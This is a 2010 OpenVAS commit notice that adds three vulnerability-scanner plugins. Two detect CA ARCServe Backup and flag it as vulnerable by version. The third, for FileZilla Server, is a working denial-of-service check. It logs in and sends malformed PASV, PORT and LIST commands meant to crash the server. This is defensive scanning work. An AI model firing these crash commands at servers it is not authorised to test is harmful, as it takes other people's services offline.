[Openvas-commits] r7206 - in trunk/openvas-plugins: . scripts
scm-commit@wald.intevation.org
scm-commit at wald.intevation.org
Fri Apr 2 10:10:30 CEST 2010
Author: glicina
Date: 2010-04-02 10:10:27 +0200 (Fri, 02 Apr 2010)
New Revision: 7206
Added:
trunk/openvas-plugins/scripts/arcserve_backup_detect.nasl
trunk/openvas-plugins/scripts/arcserve_backup_mult_bof_vuln.nasl
trunk/openvas-plugins/scripts/filezilla_server_port_cmd_dos.nasl
Modified:
trunk/openvas-plugins/ChangeLog
Log:
Added new plugins.
Modified: trunk/openvas-plugins/ChangeLog
===================================================================
--- trunk/openvas-plugins/ChangeLog 2010-04-01 13:45:54 UTC (rev 7205)
+++ trunk/openvas-plugins/ChangeLog 2010-04-02 08:10:27 UTC (rev 7206)
@@ -1,3 +1,10 @@
+2010-04-02 Goran Licina <goran.licina at lss.hr>
+
+ * scripts/arcserve_backup_detect.nasl,
+ scripts/arcserve_backup_mult_bof_vuln.nasl,
+ scripts/filezilla_server_port_cmd_dos.nasl:
+ Added new plugins.
+
2010-04-01 Michael Meyer <michael.meyer at intevation.de>
* scripts/cherokee_0_4_7.nasl,
Added: trunk/openvas-plugins/scripts/arcserve_backup_detect.nasl
===================================================================
--- trunk/openvas-plugins/scripts/arcserve_backup_detect.nasl 2010-04-01 13:45:54 UTC (rev 7205)
+++ trunk/openvas-plugins/scripts/arcserve_backup_detect.nasl 2010-04-02 08:10:27 UTC (rev 7206)
@@ -0,0 +1,77 @@
+###################################################################
+# OpenVAS Vulnerability Test
+#
+# CA ARCServe Backup Detect
+#
+# LSS-NVT-2010-002
+#
+# Developed by LSS Security Team <http://security.lss.hr>
+#
+# Copyright (C) 2010 LSS <http://www.lss.hr>
+#
+# This program is free software: you can redistribute it and/or
+# modify it under the terms of the GNU General Public License as
+# published by the Free Software Foundation, either version 2 of
+# the License, or (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public
+# License along with this program. If not, see
+# <http://www.gnu.org/licenses/>.
+###################################################################
+
+# need description here to change it later
+desc = "
+Remote host is running CA ARCServe Backup for Laptops and Desktops.
+
+See also:
+http://arcserve.com/us/products/product.aspx?id=5282
+";
+
+if(description)
+{
+ script_id(102017);
+ script_version("$Revision$");
+ script_name("CA ARCServe Backup Detect");
+ script_description(desc);
+ script_tag(name:"risk_factor", value:"None");
+ script_summary("Detects CA ARCServe Backup for Laptops and Desktops on remote hosts");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (C) 2010 LSS");
+ script_family("Service detection");
+ script_require_ports(1900);
+ exit(0);
+}
+
+port=1900;
+
+# check for open port
+if (!get_port_state(port)) exit(0);
+
+soc = open_sock_tcp(port);
+if (!soc) exit(0);
+
+# Get server version
+senddata = string("0000000019rxrGetServerVersion\n");
+send(socket:soc, data:senddata);
+r = recv_line(socket:soc, length:1000);
+
+# extract version
+match = eregmatch(pattern:"[0-9]+\.[0-9]+\.[0-9]+",string:r);
+
+if(match) {
+ set_kb_item(name:string("arcserve/", port, "/version"),value:match[0]);
+
+ if(report_verbosity > 0) {
+ info = "CA ARCServe Backup for Laptops and Desktops r" + match[0];
+ info = '\n' + "The following version of CA ARCServe Backup for Laptops and Desktops is detected: "+'\n\n'+info;
+ desc += info;
+ security_note(port:port, data:desc);
+ }
+}
+
+close(soc);
Property changes on: trunk/openvas-plugins/scripts/arcserve_backup_detect.nasl
___________________________________________________________________
Name: svn:keywords
+ Id Revision
Added: trunk/openvas-plugins/scripts/arcserve_backup_mult_bof_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/arcserve_backup_mult_bof_vuln.nasl 2010-04-01 13:45:54 UTC (rev 7205)
+++ trunk/openvas-plugins/scripts/arcserve_backup_mult_bof_vuln.nasl 2010-04-02 08:10:27 UTC (rev 7206)
@@ -0,0 +1,74 @@
+###################################################################
+# OpenVAS Vulnerability Test
+#
+# CA ARCserve Backup Multiple Buffer Overflow Vulnerabilities
+#
+# LSS-NVT-2010-003
+#
+# Developed by LSS Security Team <http://security.lss.hr>
+#
+# Copyright (C) 2010 LSS <http://www.lss.hr>
+#
+# This program is free software: you can redistribute it and/or
+# modify it under the terms of the GNU General Public License as
+# published by the Free Software Foundation, either version 2 of
+# the License, or (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public
+# License along with this program. If not, see
+# <http://www.gnu.org/licenses/>.
+###################################################################
+
+if(description)
+{
+ script_id(102018);
+ script_version("$Revision$");
+ script_cve_id("CVE-2007-5003");
+ script_bugtraq_id(24348);
+ script_name("CA ARCserve Backup Multiple Bufffer Overflow Vulnerabilities");
+ desc = "
+ Overview:
+ Multiple stack-based buffer overflows in CA (Computer Associates)
+ BrightStor ARCserve Backup for Laptops and Desktops r11.0 through
+ r11.5 allow remote attackers to execute arbitrary code via a long
+ (1) username or (2) password to the rxrLogin command in rxRPC.dll,
+ or a long (3) username argument to the GetUserInfo function.
+
+ Solution:
+ The vendor released an advisory and updates to address these issues.
+ Please see the references for more information.
+
+ References:
+ https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=156002
+ http://research.eeye.com/html/advisories/published/AD20070920.html
+ ";
+ script_description(desc);
+ script_tag(name:"cvss_base", value:"10.0");
+ script_tag(name:"risk_factor", value:"Critical");
+ script_summary("Checks if version of CA ARCServe Backup is between r11.0 and r11.5");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (C) 2010 LSS");
+ script_family("Buffer overflow");
+ script_dependencie("arcserve_backup_detect.nasl");
+ exit(0);
+}
+
+arcserve_port = 1900;
+
+if(!get_port_state(arcserve_port)) exit(0);
+
+ver = get_kb_item(string("arcserve/", arcserve_port, "/version"));
+
+if (!ver) exit(0);
+
+if(eregmatch(pattern:"11\.[0-5]+\.[0-9]+",string:ver)) {
+ security_hole(arcserve_port);
+ exit(0);
+}
+
+exit(0);
Property changes on: trunk/openvas-plugins/scripts/arcserve_backup_mult_bof_vuln.nasl
___________________________________________________________________
Name: svn:keywords
+ Id Revision
Added: trunk/openvas-plugins/scripts/filezilla_server_port_cmd_dos.nasl
===================================================================
--- trunk/openvas-plugins/scripts/filezilla_server_port_cmd_dos.nasl 2010-04-01 13:45:54 UTC (rev 7205)
+++ trunk/openvas-plugins/scripts/filezilla_server_port_cmd_dos.nasl 2010-04-02 08:10:27 UTC (rev 7206)
@@ -0,0 +1,128 @@
+###################################################################
+# OpenVAS Vulnerability Test
+#
+# FileZilla Server Port Command Denial of Service
+#
+# LSS-NVT-2010-007
+#
+# Developed by LSS Security Team <http://security.lss.hr>
+#
+# Copyright (C) 2010 LSS <http://www.lss.hr>
+#
+# This program is free software: you can redistribute it and/or
+# modify it under the terms of the GNU General Public License as
+# published by the Free Software Foundation, either version 2 of
+# the License, or (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public
+# License along with this program. If not, see
+# <http://www.gnu.org/licenses/>.
+###################################################################
+
+desc = "
+Overview:
+FileZilla Server before 0.9.22 allows remote attackers to
+cause a denial of service (crash) via a wildcard argument
+to the (1) LIST or (2) NLST commands, which results in a
+NULL pointer dereference, a different set of vectors than
+CVE-2006-6564.
+NOTE: CVE analysis suggests that the problem might be due
+to a malformed PORT command.
+
+Solution:
+Upgrade vulnerable FTP server to latest version.
+
+References:
+http://osvdb.org/34435
+";
+
+if(description)
+{
+ script_id(102019);
+ script_version("$Revision$");
+ script_cve_id("CVE-2006-6565");
+ script_bugtraq_id(21542);
+ script_bugtraq_id(21549);
+ script_tag(name:"cvss_base", value:"4.0");
+ script_tag(name:"risk_factor", value:"Medium");
+ script_name("FileZilla Server Port Command Denial of Service");
+ script_description(desc);
+ script_summary("Attempts a DoS attack on Filezilla FTP Server");
+ script_category(ACT_DENIAL);
+ script_copyright("Copyright (C) 2010 LSS");
+ script_family("FTP");
+ script_dependencies("logins.nasl");
+ exit (0);
+}
+
+if (safe_checks()) exit (0);
+
+report = "
+-------------------------------------------------------
+Plugin output:
+
+OpenVAS was able to crash the remote FTP server by sending
+a malformed PASV command.";
+
+include ("ftp_func.inc");
+
+user = get_kb_item("ftp/login");
+pass = get_kb_item("ftp/password");
+
+if (!user) exit(0);
+if (!pass) exit(0);
+
+attack = "A*";
+
+port = get_kb_item("Services/ftp");
+
+if (!port) port = 21;
+
+if (!get_port_state(port)) exit (0);
+
+soc = open_sock_tcp(port);
+
+if (!soc) exit (0);
+
+###################
+###step 1: login###
+###################
+
+cmd = "USER " + user;
+ftp_send_cmd (socket:soc, cmd:cmd);
+
+cmd = "PASS " + pass;
+ftp_send_cmd (socket:soc, cmd:cmd);
+
+########################
+###step 2: the attack###
+########################
+
+cmd = "PASV " + attack;
+ftp_send_cmd (socket:soc, cmd:cmd);
+
+cmd = "PORT " + attack;
+ftp_send_cmd (socket:soc, cmd:cmd);
+
+cmd = "LIST " + attack;
+ftp_send_cmd (socket:soc, cmd:cmd);
+
+###############################
+###step 3: attack succeeded?###
+###############################
+
+is_alive = ftp_recv_line(socket:soc);
+
+if (!is_alive) {
+ report = desc + report;
+ security_warning(data:report, port:port);
+}
+
+#end of exploit, closing open socket
+
+close(soc);
Property changes on: trunk/openvas-plugins/scripts/filezilla_server_port_cmd_dos.nasl
___________________________________________________________________
Name: svn:keywords
+ Id Revision
More information about the Openvas-commits
mailing list